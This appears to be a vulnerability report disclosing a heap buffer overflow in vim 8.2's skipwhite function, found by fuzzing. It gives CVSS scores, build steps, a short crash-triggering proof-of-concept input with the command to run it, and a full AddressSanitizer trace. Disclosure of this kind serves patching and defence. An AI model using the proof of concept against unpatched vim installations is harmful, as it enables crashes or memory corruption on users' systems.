7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.8%
✍️ Description
When fuzzing vim commit cd2f8f0e0
(works with latest build and latest commit 7c0fb8003
per this time of this report) v8.2.3811 with clang 13 and ASan, I discovered a heap buffer overflow.
Here is the poc
ev0->(
How to build
LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make -j$(nproc)
Proof of Concept
Run crafted file with this command
./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!
ASan stack trace:
aldo@vps:~/vim-8.2.3635/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!
=================================================================
==355566==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006538 at pc 0x0000013d15ae bp 0x7fffffff8910 sp 0x7fffffff8908
READ of size 1 at 0x602000006538 thread T0
#0 0x13d15ad in skipwhite /root/vimafl/src/charset.c:1469:12
#1 0x6b186b in eval0 /root/vimafl/src/eval.c:2230:9
#2 0x834eeb in ex_eval /root/vimafl/src/ex_eval.c:940:9
#3 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
#4 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
#5 0xe5a6a9 in do_source /root/vimafl/src/scriptfile.c:1420:5
#6 0xe56e45 in cmd_source /root/vimafl/src/scriptfile.c:985:14
#7 0xe56a2e in ex_source /root/vimafl/src/scriptfile.c:1011:2
#8 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
#9 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
#10 0x7cdc71 in do_cmdline_cmd /root/vimafl/src/ex_docmd.c:594:12
#11 0x13f46c2 in exe_commands /root/vimafl/src/main.c:3080:2
#12 0x13f084d in vim_main2 /root/vimafl/src/main.c:774:2
#13 0x13e5c71 in main /root/vimafl/src/main.c:426:12
#14 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#15 0x41fe1d in _start (/root/vimafl/src/vim+0x41fe1d)
0x602000006538 is located 0 bytes to the right of 8-byte region [0x602000006530,0x602000006538)
allocated by thread T0 here:
#0 0x49c5cd in __interceptor_malloc (/root/vimafl/src/vim+0x49c5cd)
#1 0x4ce952 in lalloc /root/vimafl/src/alloc.c:244:11
#2 0x4ce83a in alloc /root/vimafl/src/alloc.c:151:12
#3 0xf88136 in vim_strsave /root/vimafl/src/strings.c:27:9
#4 0x7c83d5 in do_cmdline /root/vimafl/src/ex_docmd.c:918:21
#5 0xe5a6a9 in do_source /root/vimafl/src/scriptfile.c:1420:5
#6 0xe56e45 in cmd_source /root/vimafl/src/scriptfile.c:985:14
#7 0xe56a2e in ex_source /root/vimafl/src/scriptfile.c:1011:2
#8 0x7dbd89 in do_one_cmd /root/vimafl/src/ex_docmd.c:2578:2
#9 0x7c9035 in do_cmdline /root/vimafl/src/ex_docmd.c:1000:17
#10 0x7cdc71 in do_cmdline_cmd /root/vimafl/src/ex_docmd.c:594:12
#11 0x13f46c2 in exe_commands /root/vimafl/src/main.c:3080:2
#12 0x13f084d in vim_main2 /root/vimafl/src/main.c:774:2
#13 0x13e5c71 in main /root/vimafl/src/main.c:426:12
#14 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/vimafl/src/charset.c:1469:12 in skipwhite
Shadow bytes around the buggy address:
0x0c047fff8c50: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c60: fa fa fd fa fa fa 06 fa fa fa fd fa fa fa fd fa
0x0c047fff8c70: fa fa 07 fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c90: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 00
=>0x0c047fff8ca0: fa fa 05 fa fa fa 00[fa]fa fa fd fd fa fa 00 03
0x0c047fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==355566==ABORTING
This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
40.8%